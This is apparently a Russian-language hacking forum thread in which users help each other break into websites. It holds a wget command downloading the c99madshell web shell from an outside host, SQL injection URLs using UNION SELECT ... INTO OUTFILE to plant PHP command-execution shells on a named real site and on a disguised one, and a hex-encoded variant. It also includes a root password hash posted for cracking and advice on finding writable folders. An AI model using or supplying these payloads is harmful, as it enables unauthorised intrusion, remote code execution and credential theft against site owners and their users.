Мда уж... И зачем умничать? Это по-детски как-то. Честно, как ребенок говоришь... 547, я тебе уже в личке объяснял, еще раз напишу полный и рабочий пример использования wget Code: wget http://madnet.name/files/download/9_c99madshell.php -O c99madshell.php В даном случае wget скачает файл, который находится по адресу http://madnet.name/files/download/9_c99madshell.php в файл c99madshell.php, который будет находится в текущей директории, т.е. в директории с которой был запущен wget. Если необходимо загрузить в отличную от текущей директорию, достаточно вместо c99madshell.php написать полный путь к файлу, н.п. Code: /var/www/images/smiles/smile.php А вообще, читай http://linux.about.com/od/commands/l/blcmdl1_wget.htm
Для меня лучший обменник - filehoster.Ru. а так советую зарегать хост к примеру на юкозе, и туда лить файлы
мне нужно чтобы wget'ом качнуть потом можно было,прямая ссылка как я написал,без всяких подтверждений
Здравствуйте. 1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6-- Как можно залить шелл? http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
кавычки экранируются. Облом с аутфайлом в общем. Можешь хеш расшифровать к юзеру рут =) root:C705FA72189D628A3657C885B0668778976F72E4
что можно с этим сделать? Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 3699224 bytes) in /home/gamer/public_html/messages.php on line 411
root@localhost file_priv Y into outfile & load_file рабаотает... но когда даю такой запрос пишет: Ошибка в параметрах запроса http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_GET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/* но какая тут ошибка? путь найшол вроде все правильно в tmp записывалось нормально.... может отсутствуют права на запись в директорию сайта?
я не вкурил какие линки на шеллы? О_о у меня до сих пор все живое))уже как 1 час гдето PSSSS самое прикольное что там RFI\LFI по сути))))тока там отключенно удаленное(забыл как она называется, сбудуна просто сижу, экз сдал ) в 3.4.6 колонках если 0xhex вставить то инклудь что хочеш на нем, тока есть косяка / поэтому в 3 колонке hex путей а в 4 уже hex файла )) http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,0x443a5c7777775c7275,0x70616765732e706870,5,6
http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/* уматно сайт спрятал =))
kvartira.ru -это не настоящее имя сайта)))) сайт спрятал более менее надежно... ато турки сам знаеш)))
Поищи папки на запись и не думай что когда выполниш запрос то у тебя не вылезит какая нить ошибка, то есть ошибка может и вылезит, но файл создаться, но как я понял ты его прямо в корень сайта пихаеш, поищи папку с картинками
